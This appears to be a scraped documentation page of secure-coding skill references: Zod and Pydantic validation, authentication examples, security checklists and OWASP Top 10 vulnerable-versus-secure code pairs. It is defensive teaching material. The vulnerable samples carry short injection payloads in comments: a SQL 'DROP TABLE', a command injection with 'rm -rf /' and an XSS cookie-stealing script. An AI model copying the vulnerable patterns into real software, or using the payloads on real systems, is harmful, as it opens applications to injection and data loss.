# SAFE: hmac.compare_digest uses constant-time comparison
return hmac.compare_digest(stored_hash, provided_hash)
# Better: Use a proper password hashing library
from passlib.hash import argon2
def verify_password(plain_password: str, hashed_password: str) -> bool:
# SAFE: Argon2 handles timing-safe comparison internally
return argon2.verify(plain_password, hashed_password)Detection
- JWT patterns:
jwt.get_unverified_header,algorithms=with variable - Password patterns: Manual string comparison, missing
hmac.compare_digest
# JWT algorithm confusion
grep -rn "get_unverified_header\|algorithms=\[" --include="*.py" .
# Timing attack vulnerable comparisons
semgrep --config "p/python-security-audit" .
# Check for weak password hashing
grep -rn "md5\|sha1\|sha256" --include="*.py" . | grep -i passwordSummary Table
| Vulnerability | Bandit ID | Semgrep Config | Quick Fix |
|---|---|---|---|
| SQL Injection | B608 | p/sql-injection | Parameterized queries |
| XSS | N/A | p/xss | textContent, escape() |
| CSRF | N/A | p/django | SameSite cookies, tokens |
| JWT Algorithm | B105 | p/jwt | Hardcode algorithm |
| Timing Attack | B303 | p/python-security | hmac.compare_digest |
Related Skills
input-validation- Sanitization patternsauth-patterns- Authentication implementationsecurity-scanning- Automated detection
Zod V4 Api
Zod v4 API Reference
Installation
npm install zod@latestBasic Types
import { z } from 'zod';
// Primitives
const stringSchema = z.string();
const numberSchema = z.number();
const booleanSchema = z.boolean();
const dateSchema = z.date();
const bigintSchema = z.bigint();
// String validations
z.string().min(1) // Non-empty
z.string().max(100) // Max length
z.string().email() // Email format
z.string().url() // URL format
z.string().uuid() // UUID format
z.string().regex(/pattern/) // Custom pattern
z.string().trim() // Trim whitespace
z.string().toLowerCase() // Lowercase
// Number validations
z.number().int() // Integer only
z.number().positive() // > 0
z.number().nonnegative() // >= 0
z.number().min(0) // >= 0
z.number().max(100) // <= 100
z.number().finite() // Not InfinityType Coercion (v4 Feature)
Automatically coerce input to desired type:
// Coerce to string
const stringSchema = z.coerce.string();
stringSchema.parse(123); // "123"
stringSchema.parse(true); // "true"
// Coerce to number
const numberSchema = z.coerce.number();
numberSchema.parse("123"); // 123
numberSchema.parse("3.14"); // 3.14
// Coerce to boolean
const booleanSchema = z.coerce.boolean();
booleanSchema.parse("true"); // true
booleanSchema.parse("1"); // true
booleanSchema.parse(""); // false
// Coerce to date
const dateSchema = z.coerce.date();
dateSchema.parse("2024-01-01"); // Date object
dateSchema.parse(1704067200000); // Date object
// Coerce to bigint
const bigintSchema = z.coerce.bigint();
bigintSchema.parse("9007199254740991"); // BigIntObjects
const UserSchema = z.object({
id: z.string().uuid(),
email: z.string().email(),
name: z.string().min(2).max(100),
age: z.number().int().positive().optional(),
role: z.enum(['user', 'admin', 'moderator']),
createdAt: z.coerce.date(),
});
// Infer TypeScript type
type User = z.infer<typeof UserSchema>;
// Parse and validate
const user = UserSchema.parse(data);
// Safe parse (no throw)
const result = UserSchema.safeParse(data);
if (result.success) {
console.log(result.data);
} else {
console.log(result.error.errors);
}Discriminated Unions (Recommended)
More efficient than regular unions:
const ShapeSchema = z.discriminatedUnion('type', [
z.object({
type: z.literal('circle'),
radius: z.number().positive(),
}),
z.object({
type: z.literal('rectangle'),
width: z.number().positive(),
height: z.number().positive(),
}),
z.object({
type: z.literal('triangle'),
base: z.number().positive(),
height: z.number().positive(),
}),
]);
type Shape = z.infer<typeof ShapeSchema>;
// Usage
const circle = ShapeSchema.parse({ type: 'circle', radius: 5 });Transforms
Transform data during validation:
// Transform to uppercase
const uppercaseSchema = z.string().transform(s => s.toUpperCase());
uppercaseSchema.parse("hello"); // "HELLO"
// Compute derived field
const UserInputSchema = z.object({
firstName: z.string(),
lastName: z.string(),
}).transform(data => ({
...data,
fullName: `${data.firstName} ${data.lastName}`,
}));
// Parse string to object
const jsonSchema = z.string().transform((str, ctx) => {
try {
return JSON.parse(str);
} catch {
ctx.addIssue({
code: z.ZodIssueCode.custom,
message: "Invalid JSON",
});
return z.NEVER;
}
});Refinements
Custom validation logic:
// Simple refinement
const passwordSchema = z.string()
.min(8)
.refine(
(val) => /[A-Z]/.test(val),
{ message: "Must contain uppercase letter" }
)
.refine(
(val) => /[0-9]/.test(val),
{ message: "Must contain number" }
);
// Super refinement (multiple issues)
const formSchema = z.object({
password: z.string().min(8),
confirmPassword: z.string(),
}).superRefine((data, ctx) => {
if (data.password !== data.confirmPassword) {
ctx.addIssue({
code: z.ZodIssueCode.custom,
message: "Passwords don't match",
path: ["confirmPassword"],
});
}
});Async Refinements
For async validation (e.g., database checks):
const usernameSchema = z.string()
.min(3)
.refine(
async (username) => {
const exists = await checkUsernameExists(username);
return !exists;
},
{ message: "Username already taken" }
);
// Must use parseAsync
const result = await usernameSchema.parseAsync("newuser");Error Handling
import { z, ZodError } from 'zod';
try {
UserSchema.parse(invalidData);
} catch (error) {
if (error instanceof ZodError) {
// Formatted errors
console.log(error.format());
// Flat errors
console.log(error.flatten());
// Issues array
error.issues.forEach(issue => {
console.log(issue.path, issue.message);
});
}
}
// Custom error map
const customErrorMap: z.ZodErrorMap = (issue, ctx) => {
if (issue.code === z.ZodIssueCode.invalid_type) {
return { message: `Expected ${issue.expected}, received ${issue.received}` };
}
return { message: ctx.defaultError };
};
z.setErrorMap(customErrorMap);React Hook Form Integration
import { useForm } from 'react-hook-form';
import { zodResolver } from '@hookform/resolvers/zod';
const FormSchema = z.object({
email: z.string().email(),
password: z.string().min(8),
});
type FormData = z.infer<typeof FormSchema>;
function MyForm() {
const { register, handleSubmit, formState: { errors } } = useForm<FormData>({
resolver: zodResolver(FormSchema),
});
const onSubmit = (data: FormData) => {
console.log(data);
};
return (
<form onSubmit={handleSubmit(onSubmit)}>
<input {...register('email')} />
{errors.email && <span>{errors.email.message}</span>}
<input type="password" {...register('password')} />
{errors.password && <span>{errors.password.message}</span>}
<button type="submit">Submit</button>
</form>
);
}Pydantic Comparison (Python)
from pydantic import BaseModel, EmailStr, Field, field_validator
class User(BaseModel):
email: EmailStr
name: str = Field(min_length=2, max_length=100)
age: int = Field(ge=0, le=150)
@field_validator('name')
@classmethod
def name_must_be_title_case(cls, v: str) -> str:
return v.title()
# Usage
user = User(email="test@example.com", name="john doe", age=25)
print(user.name) # "John Doe"External Links
Checklists (5)
Auth Checklist
Authentication Security Checklist
Password Security
- Use Argon2id (preferred) or bcrypt for hashing
- Minimum 12 character password requirement
- Check against common password lists
- No password hints or security questions
- Rate limit password attempts (5 per minute)
- Account lockout after 10 failed attempts
Token Security
- Access tokens: 15 min - 1 hour lifetime
- Refresh tokens: 7-30 days with rotation
- Store access tokens in memory only (not localStorage)
- Store refresh tokens in HTTPOnly cookies
- Implement refresh token rotation
- Revoke all tokens on password change
Session Security
-
SESSION_COOKIE_SECURE=True(HTTPS only) -
SESSION_COOKIE_HTTPONLY=True(no JS access) -
SESSION_COOKIE_SAMESITE='Strict' - Session timeout (1 hour inactivity)
- Regenerate session ID on login
OAuth 2.1 Compliance
- Use PKCE for ALL clients
- No implicit grant
- No password grant
- State parameter for CSRF protection
- Validate redirect_uri exactly
- Use HTTPS for all endpoints
Passkeys/WebAuthn (If Implemented)
- Require user verification (biometric)
- Require resident keys for passwordless
- Validate RP ID matches origin
- Track sign count for replay protection
- Allow multiple passkeys per user
Multi-Factor Authentication
- Offer MFA (TOTP, Passkeys)
- TOTP: 6 digits, 30-second window
- Backup codes (10 one-time use)
- Remember device option (30 days max)
- Require MFA for sensitive operations
Rate Limiting
| Endpoint | Limit |
|---|---|
| Login | 5 per minute |
| Password reset | 3 per hour |
| MFA verify | 5 per minute |
| Registration | 10 per hour |
| API general | 100 per minute |
Error Messages
- Generic "Invalid credentials" (don't reveal which is wrong)
- Don't reveal if email exists in forgot password
- Log detailed errors server-side only
- No stack traces in production
Secure Headers
response.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains'
response.headers['X-Content-Type-Options'] = 'nosniff'
response.headers['X-Frame-Options'] = 'DENY'
response.headers['Content-Security-Policy'] = "default-src 'self'"Audit Logging
- Log all authentication attempts
- Log password changes
- Log MFA setup/disable
- Log token revocations
- Log suspicious activity (multiple failed attempts)
Review Checklist
Before deployment:
- No hardcoded secrets in code
- Secrets in environment variables
- HTTPS enforced everywhere
- Rate limiting configured
- Audit logging enabled
- Password hashing uses Argon2id or bcrypt
- Token lifetimes appropriate
- MFA available
Common Vulnerabilities to Avoid
- No password in URL parameters
- No session ID in URL
- No sensitive data in JWT payload
- No implicit OAuth grant
- No predictable session IDs
- No client-side token storage in localStorage
Pre Deployment Security
Pre-Deployment Security Checklist
Before deploying any AI feature, verify all 8 layers:
Layer 0: Edge Protection
- WAF rules active for OWASP Top 10
- Rate limiting configured per user/IP
- DDoS protection enabled
- HTTPS enforced (no HTTP)
Layer 1: Gateway / Authentication
- JWT validation active
- Token expiry enforced
- RequestContext created from JWT (not user input)
- Permissions extracted from token
Layer 2: Input Validation
- Pydantic/Zod models for all request bodies
- Size limits on all inputs
- PII detection on user-provided content
- Injection pattern detection (SQL, XSS, prompt)
Layer 3: Authorization
- Every endpoint has authorization check
- RBAC/ABAC policies defined
- Cross-tenant access blocked
- Resource-level access verified
Layer 4: Data Access
- All queries use parameterized values (no f-strings)
- All queries include tenant_id filter
- Repository pattern enforces tenant scope
- Vector search includes tenant filter
Layer 5: LLM Orchestration
- No user_id in prompts
- No tenant_id in prompts
- No analysis_id in prompts
- No document_id in prompts
- No UUIDs in prompts
- Prompt audit check passes
Layer 6: Output Validation
- LLM output parsed with schema
- Content guardrails active (toxicity, PII)
- Hallucination detection for critical fields
- Output size limits enforced
Layer 7: Attribution & Storage
- Attribution uses RequestContext (not LLM output)
- Source references from pre-LLM lookup
- Audit event logged
- Data encrypted at rest
Layer 8: Observability
- Structured logging active
- Sensitive data redacted from logs
- Langfuse tracing enabled
- Metrics exported (latency, errors, tokens)
- Alerts configured for anomalies
Quick Verification Commands
# Check for IDs in prompt templates
grep -rn "user_id\|tenant_id\|analysis_id\|document_id" backend/app/**/prompts/
# Check for raw SQL (should use parameterized)
grep -rn "f\"SELECT\|f'SELECT" backend/app/
# Check for missing tenant filter
grep -rn "SELECT.*FROM" backend/app/ | grep -v "tenant_id"
# Run security linter
poetry run bandit -r backend/app/ -f json
# Check for hardcoded secrets
grep -rn "api_key\s*=\s*['\"]" backend/Sign-off required before merge:
- Developer self-review
- Security checklist verified
- Code reviewer approved
- CI/CD security scans pass
Pre Llm Call
Pre-LLM Call Checklist
Before ANY LLM Call in OrchestKit
Use this checklist before sending any prompt to an LLM:
Phase 1: Context Available
- RequestContext obtained from JWT (not user input)
- user_id available in context
- tenant_id available in context
- trace_id set for observability
Phase 2: Data Isolation
- Query includes
WHERE tenant_id = :tenant_id - Query includes
WHERE user_id = :user_id(if user-scoped) - Vector search filtered by tenant
- Full-text search filtered by tenant
Phase 3: Source References Captured
- document_ids saved for attribution
- chunk_ids saved for attribution
- Retrieval timestamp recorded
- Similarity scores captured (for debugging)
Phase 4: Content Extraction
- Only content text extracted (no metadata with IDs)
- Content stripped of any embedded UUIDs
- Content stripped of any ID field names
Phase 5: Prompt Building
- Prompt contains ONLY content text
- No user_id in prompt
- No tenant_id in prompt
- No analysis_id in prompt
- No document_id in prompt
- No UUIDs in prompt
- No API keys or secrets in prompt
Phase 6: Prompt Audit
-
audit_prompt()called on final prompt - No critical violations detected
- Warnings logged for review
Phase 7: LLM Call
- Timeout configured
- Error handling in place
- Response parsing ready
- Langfuse trace started
Quick Verification Script
from llm_safety import audit_prompt, has_critical_violations
def verify_llm_ready(
prompt: str,
ctx: RequestContext,
source_refs: SourceReference,
) -> bool:
"""Quick verification before LLM call"""
# Check context
assert ctx.user_id is not None, "Missing user_id"
assert ctx.tenant_id is not None, "Missing tenant_id"
# Check source refs captured
assert len(source_refs.document_ids) >= 0, "Source refs not captured"
# Audit prompt
violations = audit_prompt(prompt)
if has_critical_violations(violations):
raise PromptSecurityError(violations)
return TruePost-LLM Attribution Checklist
After LLM returns:
- Output parsed with schema validation
- Output checked for hallucinated IDs
- Output checked for grounding
- Content safety validated
- Attribution attached from RequestContext
- Source links created from captured refs
- Audit event logged
- Langfuse trace completed
Sign-off: Run verify_llm_ready() before every LLM call
Safety Checklist
LLM Safety Checklist
Input Safety
- Validate input length
- Detect prompt injection attempts
- Sanitize user content
- Rate limit requests
Output Safety
- Content filtering
- PII detection and redaction
- Harmful content detection
- Bias monitoring
System Prompts
- Clear boundaries
- Role definition
- Refusal instructions
- No secrets in prompts
Guardrails
- Input guardrails
- Output guardrails
- Topic restrictions
- Sensitive content handling
Monitoring
- Log flagged content
- Alert on violations
- Human review queue
- Incident response plan
Validation Checklist
Input Validation Checklist
Core Principles
- Never trust user input - validate everything
- Validate server-side - client-side is UX only
- Use allowlists - not blocklists
- Validate type, length, format, range
- Sanitize output - escape when rendering
Schema Definition
- Define schema for all API endpoints
- Use strict types (no
any) - Set reasonable min/max lengths
- Use enums for fixed value sets
- Add custom error messages
- Handle optional vs required properly
String Validation
- Trim whitespace where appropriate
- Set maximum length (prevent DoS)
- Use regex for format validation
- Escape HTML for display
- Validate email with proper regex
- Validate URLs against allowlist domains
Number Validation
- Use integer for IDs
- Set min/max bounds
- Handle NaN and Infinity
- Use coercion for query params
File Validation
- Check file extension
- Validate MIME type
- Verify magic bytes (actual content)
- Set maximum file size
- Scan for malware (production)
- Generate new filename (no user input)
Database Query Safety
- Use parameterized queries
- Allowlist sort columns
- Validate pagination limits
- Escape identifiers if dynamic
Error Messages
- Generic errors for users
- Detailed errors in logs only
- Don't reveal system internals
- Don't reveal valid usernames/emails
Validation Libraries
TypeScript/JavaScript
import { z } from 'zod';
import { zodResolver } from '@hookform/resolvers/zod';
import DOMPurify from 'dompurify';Python
from pydantic import BaseModel, EmailStr, Field
from markupsafe import escapeCommon Patterns
Allowlist (✅ Do)
const allowed = ['name', 'email', 'createdAt'];
if (!allowed.includes(sortColumn)) throw new Error('Invalid');Blocklist (❌ Don't)
const blocked = ['password', 'secret'];
if (blocked.includes(field)) throw new Error('Invalid');
// Problem: Forgets to block new sensitive fieldsType Coercion
- Use
z.coerce.*for query parameters - Handle empty strings appropriately
- Consider timezone for dates
- Parse numbers from strings safely
Async Validation
- Use for uniqueness checks (email, username)
- Rate limit async validations
- Cache validation results where appropriate
- Handle race conditions
Security Headers
Content-Security-Policy: default-src 'self'
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=blockReview Checklist
Before PR:
- All endpoints have input validation
- Server-side validation implemented
- Allowlists used instead of blocklists
- Error messages don't leak info
- File uploads validate content, not just extension
- SQL queries use parameterized statements
- HTML output is escaped
- Maximum lengths set on all strings
Common Vulnerabilities to Prevent
| Vulnerability | Prevention |
|---|---|
| SQL Injection | Parameterized queries |
| XSS | HTML escaping, CSP |
| Path Traversal | Validate/sanitize paths |
| SSRF | URL allowlist |
| ReDoS | Avoid complex regex |
| Buffer Overflow | Length limits |
Examples (3)
Auth Implementations
Authentication Implementation Examples
Password Hashing (Argon2id)
from argon2 import PasswordHasher
from argon2.exceptions import VerifyMismatchError
ph = PasswordHasher(
time_cost=3, # Number of iterations
memory_cost=65536, # 64 MB
parallelism=4, # Number of threads
)
def hash_password(password: str) -> str:
"""Hash password with Argon2id."""
return ph.hash(password)
def verify_password(password_hash: str, password: str) -> bool:
"""Verify password against hash."""
try:
ph.verify(password_hash, password)
return True
except VerifyMismatchError:
return False
# Check if rehash needed (parameters changed)
def needs_rehash(password_hash: str) -> bool:
return ph.check_needs_rehash(password_hash)JWT Access Token
import jwt
from datetime import datetime, timedelta, timezone
SECRET_KEY = os.environ["JWT_SECRET_KEY"]
ALGORITHM = "HS256"
ACCESS_TOKEN_EXPIRE_MINUTES = 15
def create_access_token(user_id: str, roles: list[str] = None) -> str:
"""Create short-lived access token."""
now = datetime.now(timezone.utc)
payload = {
"sub": user_id,
"type": "access",
"roles": roles or [],
"iat": now,
"exp": now + timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES),
}
return jwt.encode(payload, SECRET_KEY, algorithm=ALGORITHM)
def verify_access_token(token: str) -> dict | None:
"""Verify and decode access token."""
try:
payload = jwt.decode(token, SECRET_KEY, algorithms=[ALGORITHM])
if payload.get("type") != "access":
return None
return payload
except jwt.ExpiredSignatureError:
return None
except jwt.InvalidTokenError:
return NoneSession Management
from flask import Flask, session
from datetime import datetime, timedelta, timezone
app = Flask(__name__)
# Secure session configuration
app.config.update(
SECRET_KEY=os.environ["SESSION_SECRET"],
SESSION_COOKIE_SECURE=True, # HTTPS only
SESSION_COOKIE_HTTPONLY=True, # No JavaScript access
SESSION_COOKIE_SAMESITE='Strict', # CSRF protection
PERMANENT_SESSION_LIFETIME=timedelta(hours=1),
)
@app.route('/login', methods=['POST'])
def login():
user = authenticate(request.form['email'], request.form['password'])
if user:
session.permanent = True
session['user_id'] = user.id
session['created_at'] = datetime.now(timezone.utc).isoformat()
return redirect('/dashboard')
return render_template('login.html', error='Invalid credentials')
@app.route('/logout', methods=['POST'])
def logout():
session.clear()
return redirect('/login')Rate Limiting
from flask_limiter import Limiter
from flask_limiter.util import get_remote_address
limiter = Limiter(
app,
key_func=get_remote_address,
default_limits=["200 per day", "50 per hour"],
storage_uri="redis://localhost:6379",
)
@app.route('/api/auth/login', methods=['POST'])
@limiter.limit("5 per minute") # Strict rate limit for login
def login():
# Login logic
pass
@app.route('/api/auth/password-reset', methods=['POST'])
@limiter.limit("3 per hour") # Very strict for password reset
def password_reset():
# Always return success (don't reveal if email exists)
return {"message": "If email exists, reset link sent"}Role-Based Access Control
from functools import wraps
from flask import abort, g
def require_role(*roles):
"""Decorator to require specific role(s)."""
def decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not g.current_user:
abort(401)
if not any(role in g.current_user.roles for role in roles):
abort(403)
return f(*args, **kwargs)
return wrapper
return decorator
def require_permission(permission: str):
"""Decorator to require specific permission."""
def decorator(f):
@wraps(f)
def wrapper(*args, **kwargs):
if not g.current_user:
abort(401)
if not g.current_user.has_permission(permission):
abort(403)
return f(*args, **kwargs)
return wrapper
return decorator
# Usage
@app.route('/admin/users')
@require_role('admin')
def admin_users():
return get_all_users()
@app.route('/api/patients/<id>')
@require_permission('patients:read')
def get_patient(id):
return get_patient_by_id(id)Multi-Factor Authentication (TOTP)
import pyotp
import qrcode
from io import BytesIO
import base64
def generate_totp_secret() -> str:
"""Generate new TOTP secret for user."""
return pyotp.random_base32()
def get_totp_provisioning_uri(secret: str, email: str, issuer: str = "MyApp") -> str:
"""Get provisioning URI for authenticator app."""
totp = pyotp.TOTP(secret)
return totp.provisioning_uri(name=email, issuer_name=issuer)
def get_totp_qr_code(provisioning_uri: str) -> str:
"""Generate QR code as base64 image."""
qr = qrcode.QRCode(version=1, box_size=10, border=5)
qr.add_data(provisioning_uri)
qr.make(fit=True)
img = qr.make_image(fill_color="black", back_color="white")
buffer = BytesIO()
img.save(buffer, format="PNG")
return base64.b64encode(buffer.getvalue()).decode()
def verify_totp(secret: str, code: str) -> bool:
"""Verify TOTP code."""
totp = pyotp.TOTP(secret)
return totp.verify(code, valid_window=1) # Allow 1 period window
# Usage
@app.route('/api/auth/mfa/setup', methods=['POST'])
@login_required
def setup_mfa():
secret = generate_totp_secret()
uri = get_totp_provisioning_uri(secret, g.current_user.email)
qr = get_totp_qr_code(uri)
# Store secret temporarily until verified
session['pending_mfa_secret'] = secret
return {"qr_code": qr, "secret": secret}
@app.route('/api/auth/mfa/verify', methods=['POST'])
@login_required
def verify_mfa_setup():
code = request.json['code']
secret = session.get('pending_mfa_secret')
if verify_totp(secret, code):
g.current_user.mfa_secret = secret
g.current_user.mfa_enabled = True
db.session.commit()
return {"success": True}
return {"error": "Invalid code"}, 400Complete Login Flow with MFA
@app.route('/api/auth/login', methods=['POST'])
@limiter.limit("5 per minute")
def login():
email = request.json.get('email')
password = request.json.get('password')
user = User.query.filter_by(email=email).first()
# Don't reveal if user exists
if not user or not verify_password(user.password_hash, password):
return {"error": "Invalid credentials"}, 401
# Check if MFA required
if user.mfa_enabled:
# Create temporary token for MFA step
mfa_token = create_mfa_pending_token(user.id)
return {"mfa_required": True, "mfa_token": mfa_token}
# No MFA - issue tokens
return issue_tokens(user)
@app.route('/api/auth/mfa', methods=['POST'])
@limiter.limit("5 per minute")
def verify_mfa():
mfa_token = request.json.get('mfa_token')
code = request.json.get('code')
# Verify MFA pending token
user_id = verify_mfa_pending_token(mfa_token)
if not user_id:
return {"error": "Invalid or expired MFA token"}, 401
user = User.query.get(user_id)
# Verify TOTP code
if not verify_totp(user.mfa_secret, code):
return {"error": "Invalid MFA code"}, 401
return issue_tokens(user)
def issue_tokens(user):
"""Issue access and refresh tokens."""
access_token = create_access_token(user.id, user.roles)
refresh_token = create_refresh_token(user.id)
return {
"access_token": access_token,
"refresh_token": refresh_token,
"token_type": "Bearer",
"expires_in": ACCESS_TOKEN_EXPIRE_MINUTES * 60,
}Owasp Top10 Fixes
OWASP Top 10 - Vulnerable vs Secure Code
Real examples showing vulnerable code and their secure alternatives.
A01: Broken Access Control
❌ Vulnerable: Direct Object Reference
@app.get("/api/documents/{doc_id}")
def get_document(doc_id: int):
# Anyone can access any document by guessing IDs
return db.query(Document).get(doc_id)✅ Secure: Authorization Check
@app.get("/api/documents/{doc_id}")
def get_document(doc_id: int, current_user: User = Depends(get_current_user)):
doc = db.query(Document).get(doc_id)
if doc.owner_id != current_user.id and not current_user.is_admin:
raise HTTPException(403, "Access denied")
return docA02: Cryptographic Failures
❌ Vulnerable: Weak Hashing
import hashlib
password_hash = hashlib.md5(password.encode()).hexdigest()✅ Secure: Modern Password Hashing
from passlib.hash import argon2
password_hash = argon2.hash(password)
# Verify: argon2.verify(password, password_hash)A03: Injection
❌ Vulnerable: SQL Injection
query = f"SELECT * FROM users WHERE name = '{name}'"
cursor.execute(query) # name = "'; DROP TABLE users; --"✅ Secure: Parameterized Query
cursor.execute("SELECT * FROM users WHERE name = %s", (name,))
# Or with ORM:
db.query(User).filter(User.name == name).first()❌ Vulnerable: Command Injection
import os
os.system(f"convert {filename} output.png") # filename = "; rm -rf /"✅ Secure: Use subprocess with list args
import subprocess
subprocess.run(["convert", filename, "output.png"], check=True)A05: Security Misconfiguration
❌ Vulnerable: Debug in Production
app = Flask(__name__)
app.run(debug=True) # Exposes debugger, allows code execution✅ Secure: Environment-based Config
app = Flask(__name__)
app.run(debug=os.getenv("FLASK_ENV") == "development")❌ Vulnerable: CORS Allow All
CORS(app, origins="*", allow_credentials=True)✅ Secure: Explicit Origins
CORS(app, origins=["https://app.example.com"], allow_credentials=True)A07: XSS (Cross-Site Scripting)
❌ Vulnerable: Unescaped Output
element.innerHTML = userInput; // userInput = "<script>stealCookies()</script>"✅ Secure: Text Content or Sanitization
element.textContent = userInput; // Automatically escaped
// Or with sanitization:
element.innerHTML = DOMPurify.sanitize(userInput);React (Safe by Default)
// ✅ Safe - React escapes by default
<div>{userInput}</div>
// ❌ Dangerous - explicitly bypasses escaping
<div dangerouslySetInnerHTML={{__html: userInput}} />A08: Insecure Deserialization
❌ Vulnerable: Pickle from Untrusted Source
import pickle
data = pickle.loads(user_input) # Can execute arbitrary code✅ Secure: Use JSON
import json
data = json.loads(user_input) # Only parses data, no code executionQuick Reference
| Vulnerability | Fix |
|---|---|
| SQL Injection | Parameterized queries, ORM |
| XSS | Escape output, CSP headers |
| CSRF | CSRF tokens, SameSite cookies |
| Auth bypass | Check permissions every request |
| Secrets in code | Environment variables, vault |
| Weak crypto | Argon2/bcrypt, TLS 1.3, AES-256-GCM |
Validation Patterns
Input Validation Patterns
API Request Validation (TypeScript)
import { z } from 'zod';
// Request body schema
const CreateUserSchema = z.object({
email: z.string().email(),
password: z.string().min(8).max(100),
name: z.string().min(2).max(100).transform(s => s.trim()),
role: z.enum(['user', 'admin']).default('user'),
metadata: z.record(z.string()).optional(),
});
type CreateUserRequest = z.infer<typeof CreateUserSchema>;
// Express middleware
function validateBody<T extends z.ZodSchema>(schema: T) {
return (req: Request, res: Response, next: NextFunction) => {
const result = schema.safeParse(req.body);
if (!result.success) {
return res.status(400).json({
error: 'Validation failed',
details: result.error.flatten().fieldErrors,
});
}
req.body = result.data;
next();
};
}
// Usage
app.post('/api/users', validateBody(CreateUserSchema), async (req, res) => {
const user = req.body as CreateUserRequest;
// user is fully typed and validated
});Query Parameter Validation
const PaginationSchema = z.object({
page: z.coerce.number().int().positive().default(1),
limit: z.coerce.number().int().min(1).max(100).default(20),
sort: z.enum(['name', 'email', 'createdAt']).default('createdAt'),
order: z.enum(['asc', 'desc']).default('desc'),
});
function validateQuery<T extends z.ZodSchema>(schema: T) {
return (req: Request, res: Response, next: NextFunction) => {
const result = schema.safeParse(req.query);
if (!result.success) {
return res.status(400).json({
error: 'Invalid query parameters',
details: result.error.flatten().fieldErrors,
});
}
req.query = result.data;
next();
};
}
app.get('/api/users', validateQuery(PaginationSchema), (req, res) => {
const { page, limit, sort, order } = req.query;
// All values are properly typed and defaulted
});Discriminated Union for Polymorphic Data
const NotificationSchema = z.discriminatedUnion('type', [
z.object({
type: z.literal('email'),
email: z.string().email(),
subject: z.string().min(1),
body: z.string().min(1),
}),
z.object({
type: z.literal('sms'),
phone: z.string().regex(/^\+[1-9]\d{1,14}$/),
message: z.string().max(160),
}),
z.object({
type: z.literal('push'),
deviceToken: z.string().min(1),
title: z.string().max(50),
body: z.string().max(200),
}),
]);
type Notification = z.infer<typeof NotificationSchema>;
// Type-safe handling
function sendNotification(notification: Notification) {
switch (notification.type) {
case 'email':
return sendEmail(notification.email, notification.subject, notification.body);
case 'sms':
return sendSMS(notification.phone, notification.message);
case 'push':
return sendPush(notification.deviceToken, notification.title, notification.body);
}
}Allowlist Validation
// Only allow specific values
const SortColumnSchema = z.enum(['name', 'email', 'createdAt', 'updatedAt']);
// For dynamic allowlists
function createAllowlistSchema<T extends string>(allowed: readonly T[]) {
return z.enum(allowed as [T, ...T[]]);
}
const allowedColumns = ['name', 'email', 'createdAt'] as const;
const DynamicSortSchema = createAllowlistSchema(allowedColumns);File Upload Validation
const FileUploadSchema = z.object({
file: z.object({
name: z.string(),
type: z.enum(['image/jpeg', 'image/png', 'image/webp', 'application/pdf']),
size: z.number().max(5 * 1024 * 1024, 'File must be under 5MB'),
}),
});
// Validate file content (magic bytes)
const imageMagicBytes: Record<string, number[]> = {
'image/jpeg': [0xFF, 0xD8, 0xFF],
'image/png': [0x89, 0x50, 0x4E, 0x47],
'image/webp': [0x52, 0x49, 0x46, 0x46],
'application/pdf': [0x25, 0x50, 0x44, 0x46],
};
function validateFileContent(buffer: Buffer, mimeType: string): boolean {
const expected = imageMagicBytes[mimeType];
if (!expected) return false;
return expected.every((byte, i) => buffer[i] === byte);
}URL Validation with Domain Allowlist
const ALLOWED_DOMAINS = ['api.example.com', 'cdn.example.com'] as const;
const UrlSchema = z.string()
.url()
.refine(
(url) => {
const { hostname, protocol } = new URL(url);
return protocol === 'https:' && ALLOWED_DOMAINS.includes(hostname as any);
},
{ message: 'URL must be HTTPS and from allowed domains' }
);
// Usage
UrlSchema.parse('https://api.example.com/data'); // OK
UrlSchema.parse('https://evil.com/data'); // Error
UrlSchema.parse('http://api.example.com/data'); // Error (not HTTPS)Python (Pydantic) Validation
from pydantic import BaseModel, EmailStr, Field, field_validator
from typing import Literal, Union
# Basic model
class UserCreate(BaseModel):
email: EmailStr
name: str = Field(min_length=2, max_length=100)
age: int = Field(ge=0, le=150)
@field_validator('name')
@classmethod
def strip_and_title(cls, v: str) -> str:
return v.strip().title()
# Discriminated union
class EmailNotification(BaseModel):
type: Literal['email']
email: EmailStr
subject: str
body: str
class SMSNotification(BaseModel):
type: Literal['sms']
phone: str
message: str = Field(max_length=160)
Notification = Union[EmailNotification, SMSNotification]
# Allowlist validation
ALLOWED_COLUMNS = frozenset(['name', 'email', 'created_at'])
def validate_sort_column(column: str) -> str:
if column not in ALLOWED_COLUMNS:
raise ValueError(f"Invalid sort column: {column}")
return columnHTML Sanitization
from markupsafe import escape
@app.route('/comment', methods=['POST'])
def create_comment():
# Escape HTML to prevent XSS
content = escape(request.form['content'])
db.execute("INSERT INTO comments (content) VALUES (?)", [content])import DOMPurify from 'dompurify';
// Sanitize HTML input
const sanitizedHtml = DOMPurify.sanitize(userInput, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'a'],
ALLOWED_ATTR: ['href'],
});Form Validation with React Hook Form
import { useForm } from 'react-hook-form';
import { zodResolver } from '@hookform/resolvers/zod';
const SignupSchema = z.object({
email: z.string().email('Invalid email'),
password: z.string()
.min(8, 'Password must be at least 8 characters')
.regex(/[A-Z]/, 'Must contain uppercase')
.regex(/[0-9]/, 'Must contain number'),
confirmPassword: z.string(),
}).refine(data => data.password === data.confirmPassword, {
message: "Passwords don't match",
path: ['confirmPassword'],
});
type SignupForm = z.infer<typeof SignupSchema>;
function SignupForm() {
const { register, handleSubmit, formState: { errors } } = useForm<SignupForm>({
resolver: zodResolver(SignupSchema),
});
return (
<form onSubmit={handleSubmit(onSubmit)}>
<input {...register('email')} placeholder="Email" />
{errors.email && <span className="error">{errors.email.message}</span>}
<input {...register('password')} type="password" placeholder="Password" />
{errors.password && <span className="error">{errors.password.message}</span>}
<input {...register('confirmPassword')} type="password" placeholder="Confirm" />
{errors.confirmPassword && <span className="error">{errors.confirmPassword.message}</span>}
<button type="submit">Sign Up</button>
</form>
);
}Scope Appropriate Architecture
Right-sizes architecture to project scope. Prevents over-engineering by classifying projects into 6 tiers and constraining pattern choices accordingly. Use when designing architecture, selecting patterns, or when brainstorming/implement detect a project tier.
Skill Evolution
Analyzes skill usage patterns and suggests improvements. Use when reviewing skill performance, applying auto-suggested changes, or rolling back versions.
Last updated on